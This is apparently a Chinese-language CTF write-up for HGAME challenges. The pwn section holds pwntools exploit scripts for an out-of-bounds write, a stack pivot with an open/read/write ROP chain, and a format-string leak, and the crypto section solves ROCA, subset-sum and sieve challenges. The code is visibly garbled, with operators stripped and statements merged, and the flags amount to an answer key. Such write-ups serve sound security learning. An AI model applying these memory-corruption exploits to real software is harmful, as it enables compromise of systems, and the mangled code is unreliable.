pwn
counting petals
数组 v7 长度 17，输入 16 时 v7[161] 会发生溢出，溢出到 v8、v9；将其改大，会输出 canary 和 libc_start_main_ret 的地址。第 2 次进来覆盖到返回地址，写上 ROP。
from pwn import *
# Exploit sketch for "counting petals" as reproduced in the writeup.
# NOTE(review): the scrape stripped '=', '+', '<<' and the string quotes and
# merged several statements per line, so this listing is not runnable as shown.
context(archamd64, log_leveldebug)libc ELF(./libc.so.6)#p process(./vuln)
#gdb.attach(p, b*0x555555555535\nc)
p remote(node1.hgame.vidar.club, 30788)p.sendlineafter(btime?\n, b16)
for i in range(15):p.sendlineafter(b : , b0)p.sendlineafter(b : , str((0x1032)22).encode())
for i in range(6):p.sendlineafter(b : , b-)p.sendlineafter(bReply 1 indicates the former and 2 indicates the latter: , b1)
p.recvuntil(bLets look at the results.\n)
v p.recvuntil(b, dropTrue).decode().split( )
print(v)
# The v[16]/v[18] indices and the 0x29d90 libc offset are specific to this
# challenge build and its libc.so.6.
libc.address int(v[18]) - 0x29d90
canary int(v[16])
pop_rdi libc.address 0x000000000002a3e5 # pop rdi ; ret
print(f{libc.address :x} {canary :x})p.sendlineafter(btime?\n, b16)
# Second round (per the prose above): the same out-of-bounds write now
# reaches the saved return address.
pay [0]*15[(0x1032)22, canary,0,pop_rdi1,pop_rdi,next(libc.search(b/bin/sh)), libc.sym[system]]
for i in pay:p.sendlineafter(b : , str(i).encode())p.sendlineafter(bReply 1 indicates the former and 2 indicates the latter: , b1)
p.sendline(bcat flag)
p.interactive()
#flag{b945024b-f973-497c-30e4-c14722593da5}
ezstack
PIE 没开，加载地址已知。溢出正好能覆盖到返回地址。
// Decompiled (IDA) target function from the ezstack binary.
// Root cause: buf holds 80 bytes (at rbp-0x50) but read() is allowed
// 0x60 = 96 bytes, so the last 16 bytes land past the buffer, over the
// saved rbp and the return address. Bounding the read by sizeof(buf)
// would close the hole.
// NOTE(review): the scrape merged the body into one line behind the '//'
// comment, so the statements after BYREF read as comment text here.
ssize_t __fastcall vuln(unsigned int a1)
{char buf[80]; // [rsp10h] [rbp-50h] BYREFprint(a1, unk_402018);print(a1, Thats all.\n);print(a1, Good luck.\n);return read(a1, buf, 0x60uLL);
}
先移栈到 BSS，再利用 0x50 的空间写 ROP 泄露 libc，再读入后续的 ORW。
# Exploit sketch for "ezstack" as reproduced in the writeup: stack pivot to
# .bss, libc leak through the GOT, then an open/read/write chain.
# NOTE(review): the scrape stripped '=', '+' and quotes and merged lines;
# not runnable as shown.
from pwn import *
context(archamd64, log_leveldebug)#20.04 focal libc-2.31
libc ELF(./libc-2.31.so)
elf ELF(./vuln)leave_ret 0x401426
pop_rdi 0x0000000000401713 # pop rdi ; ret
pop_rsi 0x0000000000401711 # pop rsi ; pop r15 ; ret
pop_rbp 0x000000000040135d # pop rbp ; ret
bss 0x404800
ret pop_rdi1#p process(./vuln)
p remote(node2.hgame.vidar.club, 30598)
#p remote(localhost,9999)
#pause()# pivot the stack to a known address
pay flat(b\0*0x50, 0x404800, 0x4013d9)
p.sendafter(bGood luck.\n, pay)# print a GOT entry to get libc
# -50 -40 -30 -20 -10 0
pay flat(pop_rsi,elf.got[write],b/flag\0\0\0,elf.plt[write],pop_rsi,bss-0x10,0,elf.plt[read],ret,ret, bss-0x58, leave_ret)
p.sendafter(bGood luck.\n, pay)libc.address u64(p.recv(8)) - libc.sym[write]
print(f{libc.address :x})
# libc-relative gadgets; offsets are for the libc-2.31 build noted above.
p.recv(0x58)pop_rsi libc.address 0x000000000002601f # pop rsi ; ret
pop_rdx libc.address 0x000000000015fae6 # pop rdx ; pop rbx ; ret
pop_rcx libc.address 0x000000000010257e # pop rcx ; pop rbx ; ret
pop_rax libc.address 0x0000000000036174 # pop rax ; ret
save_rdi libc.address 0x000000000013b631 # mov qword ptr [rsi], rdi ; ret
save_rax libc.address 0x000000000014852a # mov qword ptr [rsi 0x10], rax ; ret
syscall libc.sym[getpid]9# print forkfd, then read
# -10 0 10 20 30 40
pay2 flat(pop_rsi, bss-0x100, save_rdi, elf.plt[write], pop_rdx,0xe0, 0,pop_rsi, bss0x40, elf.plt[read],ret,ret)
p.send(pay2)
forkfd u32(p.recv(4))
print(f{forkfd :x})
# Scratch layout in .bss used by the following stages:
p.recv(0x5c)# bss-0x100: socket id
# bss-0xf0: rax
# bss-0x40: /flag
# open(), print fd, then read
# 40 50 60 70 80
# NOTE(review): the two '#' lines after the next statement also carry the
# tail of pay3's list; the scrape merged the continuation lines into the
# offset comments.
pay3 flat([ pop_rdi, bss-0x40, pop_rsi,0, pop_rax, 2, syscall,pop_rsi, bss-0x100, save_rax,
# 90 a0 b0 c0 d0pop_rdi, forkfd, pop_rsi, bss-0x1000x10, pop_rdx,8, 0, pop_rax, 1, syscall,
# e0 f0 100 110pop_rsi,bss0x120, pop_rdx, 0x800, 0, pop_rax, 0, syscall])
p.send(pay3)
filefd u64(p.recv(8))
print(f{filefd :x})#read(filefd, ) write(forkfd, )
pay4 flat([pop_rdi, filefd, pop_rsi, bss-0x100, pop_rdx,0x50,0, pop_rax,0, syscall,pop_rdi, forkfd, pop_rax, 1, syscall])
p.send(pay4)p.interactive()format
可以多次执行 printf，但每次最多 3 字符。有个很老的板子 `%*c`：第 1 个寄存器的指针被输出，是个非常大的值；输出被先写入缓冲区再输出。输出大量空格会填充缓冲区，缓冲区后边的指针每次都会重新写入。再次输出 `%s` 就会带出 libc 地址。
另一种方法是多次输入 `%s.`：每次会多输出 1 个点，而且后边又没有 \0，所以这个串会越来越长，直到连上缓冲区里的指针。大概输出到 0xdb4 才行。不过感觉比第 1 种时间还是短点，那个 0x7fxxxxxxx 确实是有点大了。只要 docker 能顶得住就行。
# Exploit sketch for "format" as reproduced in the writeup: a format-string
# leak followed by a ROP chain. NOTE(review): '=', '+' and quotes were
# stripped by the scrape and statements were merged; not runnable as shown.
from pwn import *
context(archamd64, log_levelerror)libc ELF(./libc.so.6)#p process(./vuln)
#gdb.attach(p, b*0x4011ee\nc)
p remote(node2.hgame.vidar.club, 31824)print(rec...)
p.sendlineafter(bn , b2)
# The two 3-character format strings described in the prose above.
p.sendlineafter(btype something:, b%*c)
p.sendlineafter(btype something:, b%s\0)
# The leaked pointer is matched against _IO_2_1_stdin_ to recover the libc base.
context.log_leveldebuglibc.address u64(p.recvuntil(b\x7f)[-6:]b\0\0) - libc.sym[_IO_2_1_stdin_]
# NOTE(review): the '# pop rdi ; ret' comment on the next line has swallowed
# a trailing p.sendlineafter(...) call.
print(f{libc.address :x})pop_rdi libc.address 0x000000000002a3e5 # pop rdi ; retp.sendlineafter(bn , str(-8).encode())
#p.sendafter(btype something:, bA*4flat(0, pop_rdi1, pop_rdi,next(libc.search(b/bin/sh)), libc.sym[system]))
p.send(bA*5flat(0, pop_rdi1, pop_rdi,next(libc.search(b/bin/sh)), libc.sym[system]))sleep(0.5)
p.sendline(bcat /flag)
p.interactive()
crypto
suprimeRSA
p = k*M + pow(e, a, M)，RSAlib-cve 漏洞（ROCA）。这东西原来没见过，作起来难成。跟上一题一样，自己想确实比较不能实现。直接用 ROCA 代码爆破分解就行了。
# Challenge source for suprimeRSA as reproduced in the writeup.
# NOTE(review): '=' and '+' are stripped and several statements were merged
# into one line, some of them behind a trailing '#' comment.
from Crypto.Util.number import *
import random
from sympy import primeFLAGbhgame{xxxxxxxxxxxxxxxxxx}
# primorial(num): product of the first num primes (the author's own comment).
e0x10001def primorial(num):result 1for i in range(1, num 1):result * prime(i) #取前num个素数相乘return result
# Key-generation weakness: M is a primorial and each prime reads as
# k*M + pow(e, a, M) once the stripped '+' is restored -- the structure the
# ROCA factoring attack targets (see the solver below).
Mprimorial(random.choice([39,71,126])) #39def gen_key():while True:k getPrime(random.randint(20,40))a getPrime(random.randint(20,60))p k * M pow(e, a, M)if isPrime(p):return pp,qgen_key(),gen_key()
np*q
mbytes_to_long(FLAG)
encpow(m,e,n)print(f{n})
print(f{enc})
# Factors produced by a ROCA attack script (see the terminal log below)
# and the final decryption. Operators were stripped by the scrape.
n787190064146025392337631797277972559696758830083248285626115725258876808514690830730702705056550628756290183000265129340257928314614351263713241
enc365164788284364079752299551355267634718233656769290285760796137651769990253028664857272749598268110892426683253579840758552222893644373690398408#https://asecuritysite.com/encryption/copper
#ROCA prime-generation weakness
p954455861490902893457047257515590051179337979243488068132318878264162627
q824752716083066619280674937934149242011126804999047155998788143116757683
# Standard RSA decryption once p and q are known.
long_to_bytes(int(pow(enc,inverse_mod(e,(p-1)*(q-1)),n)))
#hgame{ROCA_ROCK_and_ROll!}
┌──(kali㉿kali)-[~/ctf/2502/roca]
└─$ sage -python roca_attack.py
3%|████▏ | 2/61 [02:22<1:09:27, 70.64s/it]
found factorization:
p954455861490902893457047257515590051179337979243488068132318878264162627
q824752716083066619280674937934149242011126804999047155998788143116757683
3%|████▏ | 2/61 [02:55<1:26:12, 87.66s/it]
这个漏洞的 M 是前 n 个素数的积，对于小于 960 位的是前 39 个。ROCA 用前 37 个，减小模，同样减小爆破范围，可以在 60000 将左右完成。不过这题有第 1 版没作出来，这是换了附件的。原来的 M 是 5128，这个用这个 ROCA 没效果。现在也不清楚已经出了的 8 个人怎么弄的。
easyBag
# Challenge source for easyBag as reproduced in the writeup.
# NOTE(review): '=', '+' and '>>' are stripped and statements were merged;
# the last line also has the author's prose fused onto it.
from Crypto.Util.number import *
import random
from Crypto.Cipher import AES
import hashlib
from Crypto.Util.Padding import pad
from secrets import flaglist []
bag []
# The secret is only 64 bits and is the sole input to the AES key below.
prandom.getrandbits(64)
assert len(bin(p)[2:])64
# Four rounds: a = 64 random 32-bit primes, b = sum of the a[j] selected by
# the bits of p (the loop tests t%2; the 'tt1' token reads as t = t >> 1).
# Publishing (a, b) turns recovering p into a 64-dimensional subset-sum problem.
for i in range(4):t pa[getPrime(32) for _ in range(64)]b0for i in a:tempt%2btemp*itt1list.append(a)bag.append(b)
print(flist{list})
# Key derivation: sha256(str(p)) with AES-ECB; whoever recovers p has the key.
print(fbag{bag})key hashlib.sha256(str(p).encode()).digest()
cipher AES.new(key, AES.MODE_ECB)
flag pad(flag,16)
ciphertext cipher.encrypt(flag)
print(fciphertext{ciphertext})p*Abag 一个简单的背包问题。不过有个坑用BKZ才出结果。
[p0 p1 ... p63] * [a0 a1 a2 a3] = [b0 b1 ...]　（p_i 为 p 的各比特位，a_j 为 64 个素数组成的列）
# Sage solver for easyBag: a lattice/BKZ attack on the four subset sums.
# 'list', 'bag' and 'ciphertext' are the values printed by the challenge;
# operators were stripped by the scrape.
A matrix(ZZ,list).T
B matrix(ZZ,bag)
M block_matrix(ZZ,[[1,A],[0,B]])v M.BKZ()
a -1*v[-1]
# Reassemble p from the recovered 0/1 coefficients (bit order reversed,
# the last four entries dropped).
p int(.join(map(str,a[:-4][::-1])),2)
#17739748707559623655
key hashlib.sha256(str(p).encode()).digest()
cipher AES.new(key, AES.MODE_ECB)
cipher.decrypt(ciphertext)
#bhgame{A_S1mple_Modulr_Subset_Sum_Problem}\x06\x06\x06\x06\x06\x06
sieve
#sage
# Challenge source for sieve as reproduced in the writeup. NOTE(review):
# '=' and '+' are stripped; the '#素数' comment on the trick() line has
# swallowed the rest of that line (the else branches and 'e = 65537').
from Crypto.Util.number import bytes_to_long
from sympy import nextprimeFLAG bhgame{xxxxxxxxxxxxxxxxxxxxxx}
# trick(k): the 'k - mul % k - 1' test with mul = (k-1)! is Wilson's
# theorem, i.e. a primality test, so primes contribute phi(k)+1 = k and
# composites phi(k) (the author's explanation follows below).
m bytes_to_long(FLAG)def trick(k):if k 1:mul prod(range(1,k)) if k - mul % k - 1 0:return euler_phi(k) trick(k-1) 1 #素数 ktrick(k-1)else:return euler_phi(k) trick(k-1)else:return 1e 65537
# p and q are the same prime, so n is a square; the solver below uses
# phi = p*(p-1) accordingly.
p q nextprime(trick(e^2//6)128)
n p * q
enc pow(m,e,n)
print(f{enc})
#enc2449294097474714136530140099784592732766444481665278038069484466665506153967851063209402336025065476172617376546
这个递归函数是运行不了的，里面包含级数级别的重复运算。但也很容易理解：1 到 n，当值是素数的时候是 phi(k)+1 也就是 k，当是合数的时候就是 phi(k)，所以就是 1..n 的 sum(phi()) + 素数的个数。
于是花了很长时间想办法。因为有个提示是二筛。
后来搜 OEIS 得到 phi(n) 和的序列，这个没有算法；沿着这搜到 a(n)+1，也就是这个序列和 +1。
另一个数——素数的个数——在 sage 里有函数 prime_pi。
# Sequence looked up on OEIS.
# NOTE(review): the next comment line also carries 'AA {}' (the memo dict,
# 'AA = {}' once '=' is restored) and the note "memo dict to avoid repeated
# lookups"; the scrape merged them into the comment.
#n以内phi(n)的和a(n) A005728a(n)1 Number of fractions in Farey series of order n.AA {} #优化字典避免重复查询
# A005728(n): partial sums of Euler's phi, computed by recursing on the
# distinct values of n//j and memoised in AA (operators stripped by the
# scrape; 'm e**2//6' at the end of the line is a separate statement).
def A005728(n):if n 0:return 1c, j -2, 2k1 n//jwhile k1 1:j2 n//k1 1if k1 in AA:v AA[k1]else:v A005728(k1)AA[k1]vc (j2-j)*(2*v-3)j, k1 j2, n//j2return (n*(n-1)-cj)//2m e**2//6
s_phi A005728(m)
# The '#1557...' comment below has swallowed 's_pi = prime_pi(e^2//6)'.
#155763335410704473s_pi prime_pi(e^2//6) #37030583 sage function
# s = s_phi - 1 + s_pi (sum of phi, minus 1, plus the prime count).
s s_phi-1s_pi
p next_prime(s128)
# n = p*p, so the private exponent is taken modulo p*(p-1).
m long_to_bytes(int(pow(enc,inverse_mod(e,p*(p-1)),p*p)))
print(m)
#hgame{sieve_is_n0t_that_HArd}